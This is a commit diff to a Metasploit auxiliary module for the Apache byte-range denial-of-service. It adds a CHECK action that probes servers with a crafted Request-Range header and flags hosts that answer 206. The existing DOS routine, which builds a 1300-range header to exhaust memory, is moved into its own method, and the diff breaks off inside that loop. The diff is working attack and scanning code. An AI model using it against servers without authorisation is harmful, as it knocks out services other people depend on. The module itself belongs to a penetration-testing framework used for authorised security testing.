added CHECK functionality to the existing module

T0X1C-1 · T0X1C-1 · commit a48c14124b48 · 2012-12-13T16:54:50.000+01:00
diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -14,6 +14,10 @@
 class Metasploit3 < Msf::Auxiliary
 
 	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WmapScanFile
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
 	include Msf::Auxiliary::Dos
 
 	def initialize(info = {})
@@ -28,7 +32,8 @@ def initialize(info = {})
 			'Author'         =>
 				[
 					'Kingcope', #original discoverer
-					'Masashi Fujiwara' #metasploit module
+					'Masashi Fujiwara', #metasploit module
+					'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
@@ -39,17 +44,74 @@ def initialize(info = {})
 					[ 'EDB', '17696'],
 					[ 'OSVDB', '74721' ],
 				],
-			'DisclosureDate' => 'Aug 19 2011'))
+			'DisclosureDate' => 'Aug 19 2011',
+
+		'Actions'  =>
+			[
+				['DOS'],
+				['CHECK']
+			],
+		'DefaultAction' => 'DOS'
+
+		))
 
 		register_options(
 			[
 				Opt::RPORT(80),
 				OptString.new('URI', [ true,  "The request URI", '/']),
-				OptInt.new('RLIMIT', [ true,  "Number of requests to send", 50])
+				OptInt.new('RLIMIT', [ true,  "Number of requests to send",50]),
+				OptString.new('ACTION', [true, "DOS or CHECK", "DOS"])
 			], self.class)
 	end
 
-	def run
+	def run_host(ip)
+
+	case action.name
+
+	when 'DOS'
+		conduct_dos()
+
+	when 'CHECK'
+		check_for_dos()
+	end
+
+	end
+
+	def check_for_dos()
+		path = datastore['URI']
+			begin
+				res = send_request_cgi({
+										'uri'           =>  path,
+										'method'        => 'HEAD',
+										'headers'       => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} })
+
+				if (res and res.code == 206)
+					print_status("Response was #{res.code}")
+					print_status("Found Byte-Range Header DOS at #{path}")
+
+
+				report_note(
+					:host   => rhost,
+					:port   => rport,
+					:data   => "Apache Byte-Range DOS at #{path}"
+
+				)
+
+				else
+					print_status("NADA")
+			
+				end
+
+
+			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			rescue ::Timeout::Error, ::Errno::EPIPE
+	end
+
+
+	end
+
+
+	def conduct_dos()
 		uri = datastore['URI']
 		ranges = ''
 		for i in (0..1299) do
